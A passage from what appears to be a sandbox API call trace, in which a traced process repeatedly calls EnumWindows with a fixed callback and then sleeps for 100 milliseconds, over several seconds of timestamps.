(dwMilliseconds=0x64) [0141.812] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0141.812] Sleep (dwMilliseconds=0x64) [0141.821] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0141.822] Sleep (dwMilliseconds=0x64) [0141.838] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0141.838] Sleep (dwMilliseconds=0x64) [0141.852] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0141.853] Sleep (dwMilliseconds=0x64) [0141.868] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0141.868] Sleep (dwMilliseconds=0x64) [0141.914] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0141.914] Sleep (dwMilliseconds=0x64) [0142.055] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0142.055] Sleep (dwMilliseconds=0x64) [0142.086] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0142.086] Sleep (dwMilliseconds=0x64) [0142.133] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0142.133] Sleep (dwMilliseconds=0x64) [0142.183] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0142.183] Sleep (dwMilliseconds=0x64) [0142.236] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0142.236] Sleep (dwMilliseconds=0x64) [0142.273] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0142.273] Sleep (dwMilliseconds=0x64) [0142.322] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0142.322] Sleep (dwMilliseconds=0x64) [0142.375] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0142.375] Sleep (dwMilliseconds=0x64) [0142.480] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0142.480] Sleep (dwMilliseconds=0x64) [0142.541] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0142.541] Sleep (dwMilliseconds=0x64) [0142.555] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0142.555] Sleep (dwMilliseconds=0x64) [0142.572] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0142.572] Sleep (dwMilliseconds=0x64) [0142.593] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0142.593] Sleep (dwMilliseconds=0x64) [0142.602] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0142.602] Sleep (dwMilliseconds=0x64) [0142.664] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0142.664] Sleep (dwMilliseconds=0x64) [0142.696] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0142.696] Sleep (dwMilliseconds=0x64) [0142.712] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0142.713] Sleep (dwMilliseconds=0x64) [0142.734] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0142.735] Sleep (dwMilliseconds=0x64) [0142.781] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0142.782] Sleep (dwMilliseconds=0x64) [0142.821] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0142.821] Sleep (dwMilliseconds=0x64) [0142.957] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0142.957] Sleep (dwMilliseconds=0x64) [0142.992] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0142.992] Sleep (dwMilliseconds=0x64) [0143.004] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0143.005] Sleep (dwMilliseconds=0x64) [0143.021] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0143.021] Sleep (dwMilliseconds=0x64) [0143.037] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0143.038] Sleep (dwMilliseconds=0x64) [0143.068] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0143.068] Sleep (dwMilliseconds=0x64) [0143.238] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0143.239] Sleep (dwMilliseconds=0x64) [0143.284] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0143.284] Sleep (dwMilliseconds=0x64) [0143.301] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0143.302] Sleep (dwMilliseconds=0x64) [0143.319] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0143.320] Sleep (dwMilliseconds=0x64) [0143.365] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0143.365] Sleep (dwMilliseconds=0x64) [0143.429] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0143.429] Sleep (dwMilliseconds=0x64) [0143.537] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0143.538] Sleep (dwMilliseconds=0x64) [0143.573] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0143.574] Sleep (dwMilliseconds=0x64) [0143.582] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0143.583] Sleep (dwMilliseconds=0x64) [0143.598] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0143.599] Sleep (dwMilliseconds=0x64) [0143.616] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0143.618] Sleep (dwMilliseconds=0x64) [0143.708] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0143.708] Sleep (dwMilliseconds=0x64) [0143.777] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0143.777] Sleep (dwMilliseconds=0x64) [0143.803] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0143.804] Sleep (dwMilliseconds=0x64) [0143.834] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0143.835] Sleep (dwMilliseconds=0x64) [0143.944] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0143.944] Sleep (dwMilliseconds=0x64) [0143.990] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0143.990] Sleep (dwMilliseconds=0x64) [0144.005] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0144.005] Sleep (dwMilliseconds=0x64) [0144.053] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0144.053] Sleep (dwMilliseconds=0x64) [0144.067] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0144.067] Sleep (dwMilliseconds=0x64) [0144.085] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0144.085] Sleep (dwMilliseconds=0x64) [0144.099] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0144.099] Sleep (dwMilliseconds=0x64) [0144.176] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0144.176] Sleep (dwMilliseconds=0x64) [0144.195] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0144.195] Sleep (dwMilliseconds=0x64) [0144.207] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0144.208] Sleep (dwMilliseconds=0x64) [0144.232] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0144.233] Sleep (dwMilliseconds=0x64) [0144.242] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0144.242] Sleep (dwMilliseconds=0x64) [0144.257] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0144.257] Sleep (dwMilliseconds=0x64) [0144.270] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0144.270] Sleep (dwMilliseconds=0x64) [0144.285] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0144.288] Sleep (dwMilliseconds=0x64) [0144.348] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0144.348] Sleep (dwMilliseconds=0x64) [0144.366] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0144.367] Sleep (dwMilliseconds=0x64) [0144.400] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0144.400] Sleep (dwMilliseconds=0x64) [0144.410] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0144.411] Sleep (dwMilliseconds=0x64) [0144.426] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0144.427] Sleep (dwMilliseconds=0x64) [0144.443] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0144.443] Sleep (dwMilliseconds=0x64) [0144.458] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0144.458] Sleep (dwMilliseconds=0x64) [0144.536] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0144.536] Sleep (dwMilliseconds=0x64) [0144.583] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0144.583] Sleep (dwMilliseconds=0x64) [0144.608] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0144.608] Sleep (dwMilliseconds=0x64) [0144.614] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0144.615] Sleep (dwMilliseconds=0x64) [0144.630] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0144.630] Sleep (dwMilliseconds=0x64) [0144.645] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0144.645] Sleep (dwMilliseconds=0x64) [0144.661] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0144.661] Sleep (dwMilliseconds=0x64) [0144.677] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0144.677] Sleep (dwMilliseconds=0x64) [0144.739] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0144.739] Sleep (dwMilliseconds=0x64) [0144.756] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0144.757] Sleep (dwMilliseconds=0x64) [0144.770] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0144.771] Sleep (dwMilliseconds=0x64) [0144.785] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0144.786] Sleep (dwMilliseconds=0x64) [0144.802] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0144.802] Sleep (dwMilliseconds=0x64) [0144.817] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0144.818] Sleep (dwMilliseconds=0x64) [0144.832] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0144.833] Sleep (dwMilliseconds=0x64) [0144.895] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0144.895] Sleep (dwMilliseconds=0x64) [0144.912] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0144.912] Sleep (dwMilliseconds=0x64) [0144.928] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0144.928] Sleep (dwMilliseconds=0x64) [0144.942] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0144.942] Sleep (dwMilliseconds=0x64) [0144.958] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0144.959] Sleep (dwMilliseconds=0x64) [0144.973] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0144.974] Sleep (dwMilliseconds=0x64) [0144.990] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0144.991] Sleep (dwMilliseconds=0x64) [0145.006] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0145.006] Sleep (dwMilliseconds=0x64) [0145.020] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0145.020] Sleep (dwMilliseconds=0x64) [0145.070] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0145.070] Sleep (dwMilliseconds=0x64) [0145.093] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0145.093] Sleep (dwMilliseconds=0x64) [0145.098] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0145.098] Sleep (dwMilliseconds=0x64) [0145.114] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0145.114] Sleep (dwMilliseconds=0x64) [0145.129] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0145.130] Sleep (dwMilliseconds=0x64) [0145.147] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0145.147] Sleep (dwMilliseconds=0x64) [0145.160] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0145.161] Sleep (dwMilliseconds=0x64) [0145.176] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0145.177] Sleep (dwMilliseconds=0x64) [0145.192] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0145.192] Sleep (dwMilliseconds=0x64) [0145.208] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0145.208] Sleep (dwMilliseconds=0x64) [0145.255] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0145.255] Sleep (dwMilliseconds=0x64) [0145.280] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0145.280] Sleep (dwMilliseconds=0x64) [0145.286] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0145.286] Sleep (dwMilliseconds=0x64) [0145.301] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0145.302] Sleep (dwMilliseconds=0x64) [0145.318] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0145.318] Sleep (dwMilliseconds=0x64) [0145.335] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0145.337] Sleep (dwMilliseconds=0x64) [0145.349] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0145.349] Sleep (dwMilliseconds=0x64) [0145.365] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0145.366] Sleep (dwMilliseconds=0x64) [0145.444] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0145.444] Sleep (dwMilliseconds=0x64) [0145.457] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0145.458] Sleep (dwMilliseconds=0x64) [0145.486] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0145.487] Sleep (dwMilliseconds=0x64) [0145.537] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0145.538] Sleep (dwMilliseconds=0x64) [0145.551] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0145.552] Sleep (dwMilliseconds=0x64) [0145.613] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0145.614] Sleep (dwMilliseconds=0x64) [0145.642] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0145.642] Sleep (dwMilliseconds=0x64) [0145.651] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0145.651] Sleep (dwMilliseconds=0x64) [0145.663] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0145.663] Sleep (dwMilliseconds=0x64) [0145.676] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0145.677] Sleep (dwMilliseconds=0x64) [0145.692] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0145.693] Sleep (dwMilliseconds=0x64) [0145.708] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0145.709] Sleep (dwMilliseconds=0x64) [0145.723] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0145.724] Sleep (dwMilliseconds=0x64) [0145.739] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0145.740] Sleep (dwMilliseconds=0x64) [0145.801] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0145.802] Sleep (dwMilliseconds=0x64) [0145.817] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0145.817] Sleep (dwMilliseconds=0x64) [0145.832] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0145.833] Sleep (dwMilliseconds=0x64) [0145.848] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0145.848] Sleep (dwMilliseconds=0x64) [0145.864] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0145.864] Sleep (dwMilliseconds=0x64) [0145.880] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0145.880] Sleep (dwMilliseconds=0x64) [0145.895] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0145.895] Sleep (dwMilliseconds=0x64) [0145.912] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0145.912] Sleep (dwMilliseconds=0x64) [0145.972] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0145.973] Sleep (dwMilliseconds=0x64) [0145.989] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0145.989] Sleep (dwMilliseconds=0x64) [0146.004] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0146.004] Sleep (dwMilliseconds=0x64) [0146.022] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0146.023] Sleep (dwMilliseconds=0x64) [0146.036] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0146.036] Sleep (dwMilliseconds=0x64) [0146.052] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0146.052] Sleep (dwMilliseconds=0x64) [0146.068] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0146.068] Sleep (dwMilliseconds=0x64) [0146.083] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0146.083] Sleep (dwMilliseconds=0x64) [0146.098] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0146.099] Sleep (dwMilliseconds=0x64) [0146.147] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0146.147] Sleep (dwMilliseconds=0x64) [0146.172] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0146.173] Sleep (dwMilliseconds=0x64) [0146.177] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0146.178] Sleep (dwMilliseconds=0x64) [0146.192] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0146.193] Sleep (dwMilliseconds=0x64) [0146.207] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0146.208] Sleep (dwMilliseconds=0x64) [0146.234] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0146.234] Sleep (dwMilliseconds=0x64) [0146.240] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0146.241] Sleep (dwMilliseconds=0x64) [0146.256] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0146.256] Sleep (dwMilliseconds=0x64) [0146.270] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0146.271] Sleep (dwMilliseconds=0x64) [0146.287] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0146.287] Sleep (dwMilliseconds=0x64) [0146.335] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0146.335] Sleep (dwMilliseconds=0x64) [0146.361] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0146.362] Sleep (dwMilliseconds=0x64) [0146.364] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0146.364] Sleep (dwMilliseconds=0x64) [0146.406] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0146.407] Sleep (dwMilliseconds=0x64) [0146.411] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0146.411] Sleep (dwMilliseconds=0x64) [0146.426] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0146.427] Sleep (dwMilliseconds=0x64) [0146.442] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0146.443] Sleep (dwMilliseconds=0x64) [0146.464] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0146.465] Sleep (dwMilliseconds=0x64) [0146.473] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0146.473] Sleep (dwMilliseconds=0x64) [0146.520] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0146.521] Sleep (dwMilliseconds=0x64) [0146.540] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0146.540] Sleep (dwMilliseconds=0x64) [0146.551] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0146.552] Sleep (dwMilliseconds=0x64) [0146.567] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0146.567] Sleep (dwMilliseconds=0x64) [0146.583] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0146.583] Sleep (dwMilliseconds=0x64) [0146.599] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0146.599] Sleep (dwMilliseconds=0x64) [0146.619] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0146.620] Sleep (dwMilliseconds=0x64) [0146.662] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0146.662] Sleep (dwMilliseconds=0x64) [0146.757] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0146.758] Sleep (dwMilliseconds=0x64) [0146.874] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0146.874] Sleep (dwMilliseconds=0x64) [0146.882] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0146.882] Sleep (dwMilliseconds=0x64) [0146.897] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0146.897] Sleep (dwMilliseconds=0x64) [0146.921] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0146.921] Sleep (dwMilliseconds=0x64) [0146.931] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0146.931] Sleep (dwMilliseconds=0x64) [0146.942] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0146.942] Sleep (dwMilliseconds=0x64) [0146.959] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0146.960] Sleep (dwMilliseconds=0x64) [0146.974] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0146.974] Sleep (dwMilliseconds=0x64) [0146.989] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0146.989] Sleep (dwMilliseconds=0x64) [0147.036] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0147.036] Sleep (dwMilliseconds=0x64) [0147.055] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0147.055] Sleep (dwMilliseconds=0x64) [0147.067] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0147.068] Sleep (dwMilliseconds=0x64) [0147.083] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0147.083] Sleep (dwMilliseconds=0x64) [0147.099] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0147.099] Sleep (dwMilliseconds=0x64) [0147.115] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0147.116] Sleep (dwMilliseconds=0x64) [0147.129] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0147.130] Sleep (dwMilliseconds=0x64) [0147.192] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0147.193] Sleep (dwMilliseconds=0x64) [0147.208] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0147.208] Sleep (dwMilliseconds=0x64) [0147.237] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0147.237] Sleep (dwMilliseconds=0x64) [0147.256] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0147.256] Sleep (dwMilliseconds=0x64) [0147.271] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0147.271] Sleep (dwMilliseconds=0x64) [0147.288] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0147.288] Sleep (dwMilliseconds=0x64) [0147.304] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0147.304] Sleep (dwMilliseconds=0x64) [0147.317] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0147.317] Sleep (dwMilliseconds=0x64) [0147.365] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0147.366] Sleep (dwMilliseconds=0x64) [0147.423] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0147.423] Sleep (dwMilliseconds=0x64) [0147.436] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0147.436] Sleep (dwMilliseconds=0x64) [0147.444] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0147.444] Sleep (dwMilliseconds=0x64) [0147.460] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0147.461] Sleep (dwMilliseconds=0x64) [0147.483] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0147.484] Sleep (dwMilliseconds=0x64) [0147.495] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0147.495] Sleep (dwMilliseconds=0x64) [0147.516] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0147.516] Sleep (dwMilliseconds=0x64) [0147.521] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0147.522] Sleep (dwMilliseconds=0x64) [0147.538] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0147.538] Sleep (dwMilliseconds=0x64) [0147.584] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0147.584] Sleep (dwMilliseconds=0x64) [0147.619] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0147.620] Sleep (dwMilliseconds=0x64) [0147.629] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0147.630] Sleep (dwMilliseconds=0x64) [0147.645] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0147.646] Sleep (dwMilliseconds=0x64) [0147.661] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0147.662] Sleep (dwMilliseconds=0x64) [0147.678] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0147.678] Sleep (dwMilliseconds=0x64) [0147.692] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0147.693] Sleep (dwMilliseconds=0x64) [0147.711] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0147.711] Sleep (dwMilliseconds=0x64) [0147.769] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0147.770] Sleep (dwMilliseconds=0x64) [0147.823] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0147.823] Sleep (dwMilliseconds=0x64) [0147.834] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0147.834] Sleep (dwMilliseconds=0x64) [0147.852] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0147.853] Sleep (dwMilliseconds=0x64) [0147.876] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0147.876] Sleep (dwMilliseconds=0x64) [0147.890] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0147.890] Sleep (dwMilliseconds=0x64) [0147.895] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0147.895] Sleep (dwMilliseconds=0x64) [0147.916] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0147.917] Sleep (dwMilliseconds=0x64) [0147.973] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0147.973] Sleep (dwMilliseconds=0x64) [0147.992] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0147.992] Sleep (dwMilliseconds=0x64) [0148.004] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0148.005] Sleep (dwMilliseconds=0x64) [0148.020] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0148.021] Sleep (dwMilliseconds=0x64) [0148.037] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0148.038] Sleep (dwMilliseconds=0x64) [0148.052] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0148.052] Sleep (dwMilliseconds=0x64) [0148.067] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0148.067] Sleep (dwMilliseconds=0x64) [0148.083] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0148.083] Sleep (dwMilliseconds=0x64) [0148.145] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0148.145] Sleep (dwMilliseconds=0x64) [0148.172] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0148.172] Sleep (dwMilliseconds=0x64) [0148.181] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0148.182] Sleep (dwMilliseconds=0x64) [0148.192] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0148.193] Sleep (dwMilliseconds=0x64) [0148.209] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0148.209] Sleep (dwMilliseconds=0x64) [0148.238] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0148.239] Sleep (dwMilliseconds=0x64) [0148.255] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0148.255] Sleep (dwMilliseconds=0x64) [0148.272] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0148.273] Sleep (dwMilliseconds=0x64) [0148.286] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0148.286] Sleep (dwMilliseconds=0x64) [0148.341] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0148.341] Sleep (dwMilliseconds=0x64) [0148.364] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0148.364] Sleep (dwMilliseconds=0x64) [0148.406] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0148.407] Sleep (dwMilliseconds=0x64) [0148.412] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0148.413] Sleep (dwMilliseconds=0x64) [0148.429] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) 